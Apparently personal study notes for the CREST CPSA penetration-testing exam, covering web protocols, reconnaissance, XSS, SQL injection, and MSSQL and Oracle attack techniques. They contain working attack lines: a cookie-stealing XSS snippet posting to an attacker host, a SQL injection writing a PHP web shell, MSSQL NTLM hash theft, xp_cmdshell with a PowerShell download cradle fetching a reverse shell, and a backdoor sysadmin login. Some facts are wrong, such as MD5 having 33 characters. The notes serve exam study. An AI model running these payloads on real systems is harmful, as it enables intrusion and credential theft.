https://en.wikipedia.org/wiki/HTTPS

Uses Public-Key Cryptography to secure information.
Commonly using RSA for crpytography.

SSL/TLS

Latest secure TLS uses TLS1.3.

Heartbleed OpenSSL exploit

https://heartbleed.com/
Leakage of data through HTTPS that use OpenSSL.

What is being leaked?

Encryption is used to protect secrets that may harm your privacy or security if they leak. In order to coordinate recovery from this bug we have classified the compromised secrets to four categories: 1) primary key material, 2) secondary key material and 3) protected content and 4) collateral.

What versions of the OpenSSL are affected?

Status of different versions:

OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable

If during your scanning you see OpenSSL 1.0.1x, you may try Hearbleed exploits to see what leaked information you can find.

Simple Object Access Protoco(SOAP)

Sends messages with XML format.
Since it takes XML data, SOAP APIs may be vulnerable to XML external entity injection(XXE) attacks.
Source: https://en.wikipedia.org/wiki/SOAP

POST /InStock HTTP/1.1
Host: www.example.org
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 299
SOAPAction: "http://www.w3.org/2003/05/soap-envelope"

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org">
  <soap:Header>
  </soap:Header>
  <soap:Body>
    <m:GetStockPrice>
      <m:StockName>T</m:StockName>
    </m:GetStockPrice>
  </soap:Body>
</soap:Envelope>

HTTP Response codes

When HTTP server sends a response, it carries a response code that indicates success or failure or an operation.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status

HTTP response status codes indicate whether a specific HTTP request has been successfully completed. Responses are grouped in five classes:

Informational responses (100–199)
Successful responses (200–299)
Redirects (300–399)
Client errors (400–499)
Server errors (500–599)

Common response codes:
200 OK. Indicates success and no issues
301 Moved Permanently - perminant redirect. i.e. text.com/help redirects to test.com/faq
401 Unauthorized
403 Forbidden
404 Not Found - Page not found.
500 Internal Server error
502 Bad Gateway - Likely when server not set up properly.

Refer to https://developer.mozilla.org/en-US/docs/Web/HTTP/Status for full list and details.

HTTP Header Fields relating to security features

https://infosec.mozilla.org/guidelines/web_security
Source: https://www.netsparker.com/blog/web-security/http-security-headers/

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Content-Security-Policy: default-src 'self'
X-Frame-Options: deny

Deprecated ones

X-XSS-Protection: 1; mode=block
Public-Key-Pins:
    pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; 
    max-age=5184000

Other useful headers

Expect-CT: max-age=86400, enforce, 
    report-uri="https://example.com/report"
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Cache-Control: no-store
Clear-Site-Data: "*"
Feature-Policy: microphone 'none'; camera 'none'

Refer here for more details
https://www.netsparker.com/blog/web-security/http-security-headers/
https://infosec.mozilla.org/guidelines/web_security#web-security-cheat-sheet

G5: Web Markup Languages

HypterText Markup Language
In popular use now as web GUI language.
HTML/CSS/JS

Extensible Markup Language (XML)
Not so polular for use int transmitting data, but we may still find services using it, such as SOAP.
Also used as config file storage in web servers, etc.

G6: Web programming Languages

Common web programming languages: JSP, ASP, PHP, CGI based Perl and JavaScript.

Language Desc
Jakarta Server Pages (JSP) Used in TOMCAT servers. .jsp, .jspx
Active Server Pages(ASP) Common in Microsoft .NET frameworks and IIS. .asp,.aspx
PHP: Hypertext Preprocessor Commonly used language. Wordpress blog framework uses php. .php
Common Gateway Interface(CGI) A set of protocols to communicate with HTTP server. Has Python, Perl based CGI.
Javascript(JS) Popular with Single Page Applications. Refer to NodeJS, and Express server. ReactJS and AngularJS
Python Django, Flask frameworks available
Ruby Ruby on Rails framework
Rust rocket.rs
C++ treefrog framework

A language is just a language. Almost all Languages have it's own web support or framework.

Frontend: HTML/CSS/JS
The above list is common for the data processing aspect, and thus for backend.

G7 Web Application Server Vulnerabilities

Vulnerabilities in common application frameworks, servers and technologies: .NET, J2EE, Coldfusion, Ruby on Rails and AJAX.

OWASP TOP 10 Web vulnerabilites affects all websites, frameworks and applications. It is better to talk about common web vulnerabilites than the server-specific vulnerabilities.

Not all servers have "Common" vulnerabilities, or rather, the classification of "common" is difficult. Vulnerabilities oftern depends on patch levels, versions, dependencies etc.

Web Vulnerabilities
.NET web.config exposure is common.
J2EE https://owasp.org/www-pdf-archive/OWASP_NL_Top_Ten_Web_Application_Vulnerabilities_in_J2EE.pdf. Not many known vulnerabilties as found in ExploitDB. SAP NetWeaver J2EE Engine 7.40 - SQL Injection
Coldfusion ColdFusion 8,9,10 has multiple vulnerabilities such as remote code execution, authentication bypass, cross-site scripting etc.
Ruby on Rails Has remote code exucution, file disclosures etc.
AJAX There isn't a web server called AJAX, but it is for asynchronous communications with backend servers.

G8: Web APIs

Application interfaces: CGI, ISAPI filters and Apache modules.
| Item | Description |
| --- | --- |
| Common Gateway Interface(CGI) | A set of protocols to communicate with HTTP server. Has Python, Perl based CGI. Enumerate cgi-bin path to find hidden scripts. |
| ISAPI | Used in Windows IIS. DLL files that can run data processing. https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90) |
| Apache | https://httpd.apache.org/docs/2.4/mod/ |
| representational state transfer, REST or RESTful API | MODERN and COMMON API. Uses HTTP req and res. https://www.redhat.com/en/topics/api/what-is-a-rest-api. Full name is "representational state transfer" |

REST API is most common for backend work in the context of 2021.
There are also JAVA frameworks like Spring to consider.
https://developer.mozilla.org/en-US/docs/Learn/Server-side/First_steps/Web_frameworks

G9: Web Subcomponents

Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X.
Flash Application Testing
.Net Thick Clients
Java Applets
Decompilation of client-side code

Thin vs Thick Clients

https://medium.com/@mouna.mallipeddi/thin-client-vs-thick-client-69d90c13d02d
Tech/computing term, not a web term. May refer to software or hardware.
Thin - barebones device/app that needs connects to external resouces
Thick - Self-sufficient, self-contained. e.g. LAMPP stack, where it is all on one device, and we can launch locally without internet. Also used when there is a need for offline usage.

Servlets

A servlet is a small Java program that runs within a Web server.

Execution of Servlets basically involves six basic steps:

The clients send the request to the webserver.
The web server receives the request.
The web server passes the request to the corresponding servlet.
The servlet processes the request and generates the response in the form of output.
The servlet sends the response back to the webserver.
The web server sends the response back to the client and the client browser displays it on the screen.
Source: https://www.geeksforgeeks.org/introduction-java-servlets/

Applets

An applet is a program written in the Java programming language that can be included in an HTML page, much in the same way an image is included in a page.

Applet vs Servlet

https://www.geeksforgeeks.org/difference-between-applets-and-servlets/

Applet Servlet
Applets are used to provide interactive features to web applications that cannot be provided by HTML alone like capture mouse input etc. Frontend Backend processing. Similar to PHP, ASP.NET

ActiveX

https://en.wikipedia.org/wiki/ActiveX
Created by Microsoft for Internet Explorer.
Still available in Internet Explorer 11, but not in the new Microssft Edge.

Provides frontend media interactions and functionalities, like plugins.

Flash Application Testing

Flash has been deprecated and not in used any more.
https://en.wikipedia.org/wiki/Adobe_Flash
The Flash Player was deprecated in 2017 and officially discontinued at the end of 2020

Flash was used to create and display media for web. Famously Flash games were immensely popular for its time.

Flash Application Testing probably will not come up in today's context. If there is, then feel free to search for it in ExploitDB.

.Net Thick Clients

https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology

Author's Note: Thin and Thick clients seem to oftern refer to hardware devices. Thin client device does not even have their own OS. Not sure what Thin and Thick would mean in a .Net or web context. The Cyberark article classifies Multitier Architecture as Thick client.

Appendix H: Web Testing Methodologies

H1: Web Application Reconnaissance

Benefits of performing application reconnaissance.
Discovering the structure of web applications.
Methods to identify the use of application components defined in G1 to G9.

Benefits

Gives clear view of possible attack vectors.

Enumeration (Discovery)

General enumeration

Scan all ports. There may be more applications on other ports.

nmap -p- <target_ip>

Request Analysis

  • Burpsuite
  • OWASP ZAP. Do not use ZAP in OSCP exams.
  • POSTMAN - Good for API development. Good to use for sending manual requests.

Mastery of Burpsuite is recommended.

Path/Directory discovery

  • Dirbuster - https://tools.kali.org/web-applications/dirbuster
  • Gobuster - https://github.com/OJ/gobuster
  • WFUZZ - https://tools.kali.org/web-applications/wfuzz

Subdomain discovery - DNS zone transfer

If DNS on port 53 is open, it is worth a shot to run a DNS zone transfer to find any subdomain information, or other domain information

dig axfr @<DNS_IP>
dig axfr @<DNS_IP> <DOMAIN>

If there isn't, FUZZ for subdomains. See directory discovery.

Gobuster modes:
Available Modes
dir - the classic directory brute-forcing mode
dns - DNS subdomain brute-forcing mode
s3 - Enumerate open S3 buckets and look for existence and bucket listings
vhost - virtual host brute-forcing mode (not the same as DNS!)
Source: https://zweilosec.gitbook.io/hackers-rest/web/web-notes/subdomain-virtual-host-enumeration

H2: Threat Modelling and Attack Vectors

Simple threat modelling based on customer perception of risk.
Relate functionality offered by the application to potential attack vectors.

H3: Information gathering from Web Markup

Examples of the type of information available in web page source that may prove useful to an attacker:
• Hidden Form Fields
• Database Connection Strings
• Credentials
• Developer Comments
• Other included files
• Authenticated-only URLs

Use "View Page Source"
Use Developer Tools in browser
- inspect element
- network tab - see what resources are loaded
- storage - for cookie scanning

H4: Authentication Mechanisms ( Signups and logins )

Common pitfalls associated with the design and implementation of application authentication mechanisms.

Data flow for authentication:
1. user fills in form
2. Form submitted over POST
3. Username and Password compared to what is saved in databases. (Passwords are usually Hashed)
4. returns data to user's browser

Common pitfalls:
- Inputs not sanitized. Need to escape HTML special characters on frontend and backend. Once sanitized, largely reduce risks of SQL injection and cross-site scripting attacks. See section on "Input Validation".
- Credentials hidden in the form values. Insecure.
- Prepared statements must be used for SQL injection protection. https://www.w3schools.com/php/php_mysql_prepared_statements.asp
- Credentials saved as plaintext
- Using weak encryption.
- Basic Authentication uses Base64 encoding to store the credentials. If the encoded credentials is leaked, it is easy to get the actual username and password from it.
- Password reuse

H5: Authorization Mechanisms (Permission to view/edit. Admin user vs normal user)

Common pitfalls associated with the design and implementation of application authorisation mechanisms.

Commonly happens to misconfigured webapps. E.g. A known attack on wordpress is to head to the signup page, signup, and the new user can post, and even be admin user. There is a Bot attack going around which does this, and automatically redirects the website to a malicious website.

H6: Input Validation

The importance of input validation as part of a defensive coding strategy.
How input validation can be implemented and the differences between white listing, black listing and data sanitisation.

Importance

Escaping HTML special characters will decrease risk of XSS and SQLinjection attacks.
For file uploads, it is important to only allow .jpg for example. If we allow any kind of files, attackers have an easy time uploading malicious PHP files, or other code exuction payloads.

Black Listing

  • Specify which file extensions are not allowed.
  • Specify what symbols are not allowed in input field, usually done via regular expressions(Regex).

If we fail to specify, everything else is allowed. White listing is recommended.

White listing

  • Specify which file extensions are allowed.
  • Specify what symbols are allowed in input field, usually done via regular expressions(Regex).

Everything else is blocked by default.

Input sanitization

Author's Note: In this context of input validation, i believe Data sanitization refers to input sanitization.
Data sanitization deals with how we can securely erase data.
https://en.wikipedia.org/wiki/Data_sanitization

https://www.esecurityplanet.com/endpoint/prevent-web-attacks-using-input-sanitization/

Some parts to not of where we need to sanitize inputs:
- HTML output
- HTML attributes
- Javascript
- CSS
- SQL
- Cookies
- HTTP Headers
- URL GET parameters
- POST data

Depending on how the server processes data, even HTTP headers such as "User Agent" can be used for SQL injection.
More reading:
https://www.w3schools.com/php/php_form_validation.asp
https://dev.to/mrkanthaliya/validating-and-sanitizing-user-inputs-on-python-projects-rest-api-5a4
This

import bleach
bleach.clean('<script>alert("You have been hacked")</script> )

The above python code will prevent the XSS attack from running.

H7: Missing from the official CREST CPSA syllabus document

SYL_CRT_CPSA_V2.0, dated 16 October 2020.

== H7 empty ==

H8: Information Disclosure in Error Messages

How error messages may indicate or disclose useful information.

Error messages will leak path information of the OS, SQL commands used to save data, what software are used, and all sorts of data.

This is the first step in Error-Based SQLi attacks.

H9: Cross-site Scripting(CSS)

Potential implications of a cross site scripting vulnerability.
Ways in which the technique can be used to benefit an attacker.

Types of XSS

https://portswigger.net/web-security/cross-site-scripting
1. Reflected
2. Stored
3. DOM-Based

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Stored XSS (also known as persistent or second-order XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

Source: Portswigger

See the Portswigger article for XSS prevention.

Implications

Attackers can use an innocent web app to launch attacks.

  • In modern context, XSS attacks can cause users of the vulnerable webserver help attackers mine bitcoin or other cryptocurrencies. This attack is called Cryptojacking
    https://www.varonis.com/blog/cryptojacking/
  • Defacement of website is possible.
  • DoS attacks may be attempted by using users of the vulnerable web app
  • Since attacked is launced by users of affected webapp, the real attacker's identity is hidden. Of course, the web app can trace who placed the XSS payloads, but this may take time and effort.

H10: Use of Injection Attacks

Potential implications of injection vulnerabilities:
• SQL injection
• LDAP injection
• Code injection
• XML injection

Ways in which these techniques can be used to benefit an attacker.

  • Extraction of data, hence leaking data
  • Credentials and other sensitive information may be leaked
  • Code execution can be achieved.
  • Once Code execution is achieved, it is possible to take over the server. Attackers may put in back doors, use the server as a botnet zombie, or whatever else the attacker wants.

H11: Session Handling

Common pitfalls associated with the design and implementation of session handling mechanisms.

A session is the time where a user is using the website.
https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html

The session may manage temporary data, authentication and authorization data that the server can process.

Session Hijacking

A session of an authenticated user and an unauthenticated user is different. An attacker will look to obtain session cookie data of an authenticated user.

Once we have the authenticated session cookie, it may be possible to access restricted pages by pretending to be the authenticated user.

Session Hijacking can be done through XSS as well, likely "stored XSS". A javascript code can read cookie data and send it over the web.

H12: Encryption and encoding

Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic values (e.g. MD5 hashes)
Identification of common SSL vulnerabilities

Common Techniques

RSA for HTTPS.
Data maybe transferred as Base64 encoding string

Identification of Base64

We may see an == at the back of the long string. This is due to Base64's block requirements. If there are no empty blocks, there will not be the = symbols.
An easy way to identify is just to run through Cyberchef or Burpsuite decoder and see if the output makes sense.

Identification of MD5

MD5 hash has 33 characters.

We can use tools like hash-identifier to help guess the Hash types
https://tools.kali.org/password-attacks/hash-identifier

H13: Source Code Review

Common techniques for identifying and reviewing deficiencies in the areas of security.

Code review usually done by developers before pushing the code to production environment.
This can be done through the engineer, and automated tools.

Static Code analysis

https://owasp.org/www-community/Source_Code_Analysis_Tools

Many tools for code analysis.

Web Testing Techniques

I1: Website Structure Discovery

Spidering tools and their relevance in a web application test for discovering linked content.
Forced browsing techniques to discover default or unlinked content.
•Identification of functionality within client-side code

Enumeration (Discovery)

General enumeration

Scan all ports. There may be more applications on other ports.

nmap -p- <target_ip>

Request Analysis

  • Burpsuite
  • OWASP ZAP. Do not use ZAP in OSCP exams.
  • POSTMAN - Good for API development. Good to use for sending manual requests.

Mastery of Burpsuite is recommended.

Path/Directory discovery

  • Dirbuster - https://tools.kali.org/web-applications/dirbuster
  • Gobuster - https://github.com/OJ/gobuster
  • WFUZZ - https://tools.kali.org/web-applications/wfuzz

Subdomain discovery - DNS zone transfer

If DNS on port 53 is open, it is worth a shot to run a DNS zone transfer to find any subdomain information, or other domain information

dig axfr @<DNS_IP>
dig axfr @<DNS_IP> <DOMAIN>

If there isn't, FUZZ for subdomains. See directory discovery.

Gobuster modes:
Available Modes
dir - the classic directory brute-forcing mode
dns - DNS subdomain brute-forcing mode
s3 - Enumerate open S3 buckets and look for existence and bucket listings
vhost - virtual host brute-forcing mode (not the same as DNS!)
Source: https://zweilosec.gitbook.io/hackers-rest/web/web-notes/subdomain-virtual-host-enumeration

Functionality

Use our own hands to determine.

I2: Cross-site Scripting Attacks

Arbitrary JavaScript execution.
Using Cross Site Scripting techniques to obtain sensitive information from other users.
Phishing techniques.

JS execution

Insert the following into any inputs/parameters you can find.

<script>alert("Hello World")</script>

Obtaining information from other users

The following JS script will save the cookie into the variable x.

let x = document.cookie;
// send the cookie to an attacker's listener
xhttp.open("POST", "http://attackers.server/listener");
xhttp.send(x);

XSS Phishing

https://www.doyler.net/security-not-included/xss-phishing
Attackers could use JS to overlay their own HTML form into a webpage and have users login from their malicious form.

SQL Injection

Determine the existence of an SQL injection condition in a web application.
Determine the existence of a blind SQL injection condition in a web application.
Exploit SQL injection to enumerate the database and its structure.
Exploit SQL injection to execute commands on the target server.

Types of SQL injection
- Error-Based
- Blind Injection

Error-Based

Try and cause an error.
'
use a Single Quote on an input. If an error is caused, it is a possible Error-Based SQLinjection vector.

Blind Injection (Time Based)

https://owasp.org/www-community/attacks/Blind_SQL_Injection

This type of blind SQL injection relies on the database pausing for a specified amount of time, then returning the results, indicating successful SQL query executing. Using this method, an attacker enumerates each letter of the desired piece of data using the following logic:

If the first letter of the first database’s name is an ‘A’, wait for 10 seconds.

If the first letter of the first database’s name is an ‘B’, wait for 10 seconds. etc.

Microsoft SQL Server
http://www.site.com/vulnerable.php?id=1' waitfor delay '00:00:10'--
MySQL
SELECT IF(expression, true, false)

Using some time-taking operation e.g. BENCHMARK(), will delay server responses if the expression is True.
BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))
will execute the ENCODE function 5000000 times.

Depending on the database server’s performance and load, it should take just a moment to finish this operation. The important thing is, from the attacker’s point of view, to specify a high-enough number of BENCHMARK() function repetitions to affect the database response time in a noticeable way.

Example combination of both queries:

1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

If the database response took a long time, we may expect that the first user password character with user_id = 1 is character ‘2’.

(CHAR(50) == '2')
Using this method for the rest of characters, it’s possible to enumerate entire passwords stored in the database. This method works even when the attacker injects the SQL queries and the content of the vulnerable page doesn’t change.

Source: Blind SQL Injection, OWASP. extracted 06-Sep-2021
https://owasp.org/www-community/attacks/Blind_SQL_Injection

Exploit SQL injection to enumerate the database and its structure.

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://portswigger.net/web-security/sql-injection/cheat-sheet

MYSQL

SELECT @@version -- this will find database version
SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
SELECT sleep(10) -- time delay to check for Time based blind injection possiblity

Exploit SQL injection to execute commands on the target server.

Usually, we will use MySQL commands to inject a file into the server. We then use that malicious file to achieve code execution.

The code below writes a PHP payload using a UNION error-based attack. It saves the PHP file into the web directory.

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

Source: DRD_, Null Byte - Wonder How To, 12/22/2018
https://null-byte.wonderhowto.com/how-to/use-sql-injection-run-os-commands-get-shell-0191405/

I6: Parameter Manipulation

Parameter manipulation techniques, particularly the use of client side proxies.

Parameters that could be manipulated
- Cookies
- Form Fields
- URL Query Strings
- HTTP Headers

Example from a real world example on a travel web site modified to protect the innocent (or stupid).
Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
The attacker can simply modify the cookie to;
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
Source: https://www.cgisecurity.com/owasp/html/ch11s04.html

Header Manipulation

We might be able to change USER AGENT, Referrer values to by pass filters on the server.

Form field manipulation

Here, we have a simple login form with a hidden field which decides if a new user is administrative user or not. Some badly made sites may have hidden form fields like this.

<form action="/signup" method="POST">
    <input type="text" id="username" name="username">
    <input type="text" id="password" name="password">
    <input name="administrator" type="hidden" value="no">
</form>

We can simple use the Inspect Element tool on the browser to change the value of "administrator" to yes, and send the form. This might create a new administrative user.
We can use also Burpsuite as well to intercept and change the POST data.

URL Manipulation

Usually related to GET query Parameters.
If a signup is done through GET, the URL may look something like this

https://victim.server/signup?username=iamhero&password=1234&administrator=no

Simply changing the no to a yes in the URL, we may be able to create a new administrative user.

GET parameters can hold any kind of data. It is up to the security analyst to decide how best make use of this attack vector.

Databases

J1: Microsoft SQL Server(MSSQL)

Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

Default MS-SQL System Tables
- master Database : Records all the system-level information for an instance of SQL Server.
- msdb Database : Is used by SQL Server Agent for scheduling alerts and jobs.
- model Database : Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
- Resource Database : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
- tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.

mssqlclient.py

Source: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

mssqlclient.py  -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine

#Once logged in you can run queries:
SQL> select @@ version;

#Steal NTLM hash
sudo responder -I <interface> #Run that in other console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat

#Try to enable code execution
SQL> enable_xp_cmdshell

#Execute code, 2 sintax, for complex and non complex cmds
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

Manual commands

SELECT name FROM master.dbo.sysdatabases #Get databases
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; #Get table names
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
sp_addsrvrolemember 'hacker', 'sysadmin'

Check out the HackTricks article for more information.
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server.

Post Explotation

The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege.
You probably will be able to escalate to Administrator using this token: Juicy-potato

J2: Oracle RDBMS

Derivation of version and patch information from hosts running Oracle software.
Default Oracle accounts.

See: https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener

Finding version

SELECT * FROM v$version;

Patches

Listing applied patches:

[oracle@den03adm03 admin]$ $ORACLE_HOME/OPatch/opatch lspatches
30503372;OJVM PATCH SET UPDATE 11.2.0.4.200114
29938455;OCW Patch Set Update : 11.2.0.4.191015 (29938455)
30310975;DATABASE PATCH FOR EXADATA (Jan 2020 - 11.2.0.4.200114) : (30310975)

Source: https://orahow.com/check-patches-applied-in-oracle-database/

Default Oracle Accounts

https://docs.oracle.com/cd/A97630_01/win.920/a95490/username.htm
https://www.orafaq.com/wiki/List_of_default_database_users
http://www.oracle-wiki.net/premium:startdocsdefaultschemas

Oracle9i installs with a number of default accounts. Database Configuration Assistant locks and expires all default database accounts upon successful installation with the following exceptions:
- SYS
- SYSTEM
- SCOTT
- DBSNMP

Source: https://docs.oracle.com/cd/A97630_01/win.920/a95490/username.htm
This is for Oracle9i.

Latest Oracle version is Oracle Version 19C.

All databases created by the Database Configuration Assistant (DBCA) include the SYS, SYSTEM, and DBSNMP database accounts. In addition, Oracle Database provides several other administrative accounts. Before using these accounts, you must unlock them and reset their passwords.

List of users for Oracle 19c
https://docs.oracle.com/en/database/oracle/oracle-database/19/ntdbi/oracle-database-system-privileges-accounts-and-passwords.html#GUID-7513171C-1055-48BB-8C79-B27EECC9B7E9

J3: Web / App / Database Connectivity

Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications.

Common relational databases

  • MSSQL
  • MySQL
  • SQLite3
  • MS Access

Common non-relational databases

  • MongoDB
  • NoSQL

Web connections to applications.

A webapp usually will have code to login to the database.

<?php
$servername = "localhost";
$username = "username";
$password = "password";

try {
  $conn = new PDO("mysql:host=$servername;dbname=myDB", $username, $password);
  // set the PDO error mode to exception
  $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
  echo "Connected successfully";
} catch(PDOException $e) {
  echo "Connection failed: " . $e->getMessage();
}
?>

Source: W3schools, "PHP Connect to MySQL", https://www.w3schools.com/php/php_mysql_connect.asp

Regardless of programming langueage, connecting to the database requires some variation of the following:
- Server IP address
- database port
- username
- password
- database name

Once we have an entry into a machine, it is good to look at the web config files to find credentials for databases. The credentials could lead to privilege escalation or lateral movement, or password reuse attacks.

Common Ports for CPSA exam

Includes services covered in the technical syllabus.

Includes ports used by proprietary services such as Cisco VOIP, SOLARIS, BERKEYLEY R-commands etc...

Protocol Port Service Commonly Associated OS/remarks
TCP 22 SSH -
TCP 23 Telnet -
UDP 69 TFTP -
TCP 79 fingerd -
TCP 80 HTTP -
UDP 123 NTP -
UDP 161 SNMP - SNMP Agent -
UDP 162 SNMP - SNMP Manager -
TCP 443 HTTPS -
TCP 500 IPSec - Sometimes used for IKE over TCP https://www.speedguide.net/port.php?port=500
UDP 500 IPSec Internet Key Exchange (IKE) -
UDP 4500 IPSec Nat Traversal -
TCP/UDP 5060 SIP for VoIP -
TCP/UDP 5061 SIP for VoIP -
- - - -
- - - -
- - - -
- - - -
- - - -
- - - -
- - - -
- - - -

Berkeley R Commands

Protocol Port Client Daemon
TCP 512 rexec rexecd
TCP 513 rlogin rlogind
TCP 514 rcp rshd
TCP 514 rsh rshd
UDP - rstat rstatd
UDP 513 ruptime whod
UDP 513 rwho whod

Source: https://en.wikipedia.org/wiki/Berkeley_r-commands

Windows

Protocol Port Service Commonly Associated OS/remarks
TCP 20 FTP Default Data -
TCP 21 FTP Control -
TCP 23 Telnet -
TCP 25 SMTP -
TCP/UDP 53 DNS -
TCP/UDP 88 Kerberos -
TCP/UDP 464 Kerberos Password V5 -
UDP 67 DHCP -
UDP 69 TFTP -
TCP 110 POP3 -
TCP 135 RPC -
TCP 593 RPC over HTTPS -
UDP 137 NetBIOS Name Resolution -
UDP 138 NetBIOS Datagram Service -
TCP 139 NetBIOS Session Service -
TCP/UDP 389 LDAP Server -
TCP 636 LDAP SSL -
TCP 139,445 SMB -
TCP 3389 Terminal Services/Remote Desktop Protocol -
TCP 119 NNTP -
TCP 564 NNTP over SSL -
UDP 161 SNMP -
- - - -

References

For Windows: https://docs.microsoft.com/en-US/troubleshoot/windows-server/networking/service-overview-and-network-port-requirements